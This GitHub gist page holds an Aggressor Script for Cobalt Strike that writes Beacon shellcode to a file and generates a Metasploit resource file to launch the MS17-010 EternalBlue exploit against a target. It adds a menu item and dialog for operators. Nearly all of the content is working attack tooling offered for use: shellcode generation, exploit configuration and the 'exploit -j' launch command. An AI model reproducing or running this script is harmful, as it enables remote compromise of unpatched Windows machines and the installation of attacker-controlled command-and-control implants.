Skip to content

Instantly share code, notes, and snippets.

Last active October 10, 2023 15:05
  • Star 22 You must be signed in to star a gist
  • Fork 3 You must be signed in to fork a gist
Star You must be signed in to star a gist
What would you like to do?
Script to deliver Cobalt Strike's Beacon payload with the Metasploit Framework's exploit/windows/smb/ms17_010_eternalblue exploit.
# script to help move around with ms17-010 from Metasploit
# Go to Attacks -> Eternal Blue
# target, listener, where to save .rc file
sub generate_rc_file {
local('$target $listener $where $handle $shellcode');
($target, $listener, $where) = @_;
# generate our shellcode
$shellcode = shellcode($listener, true, "x64");
if ($shellcode is $null) {
return "ERROR: There is no x64 shellcode for $listener";
# write out our shellcode
$handle = openf("> $+ $where $+ .bin");
writeb($handle, $shellcode);
# write out our .rc file
$handle = openf("> $+ $where");
println($handle, "use exploit/windows/smb/ms17_010_eternalblue ");
println($handle, "set RHOST $target");
println($handle, "set PAYLOAD generic/custom");
println($handle, "set PAYLOADFILE $where $+ .bin");
println($handle, "set MaxExploitAttempts 1");
println($handle, "exploit -j");
# tell the user what to do!
return "resource $where";
sub generate_rc_file_prompt {
# ask where to save it
prompt_file_save("launch.rc", lambda({
# generate our .rc file
$run = generate_rc_file($args['target'], $args['listener'], $1);
# tell the user about it!
prompt_text("Run this command in Metasploit: ", $run, {});
}, $args => $3));
# the dialog, nothing fancy!
sub openEternalBlueDialog {
$dialog = dialog("ms17-010", %(), &generate_rc_file_prompt);
dialog_description($dialog, "Generate a Metasploit Framework .rc file to deliver a Cobalt Strike Beacon with ms17-010. x64 Targets only!");
drow_text($dialog, "target", "Target:");
drow_listener($dialog, "listener", "Listener:");
dbutton_action($dialog, "Generate");
popup attacks {
item "&Eternal Blue" {
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment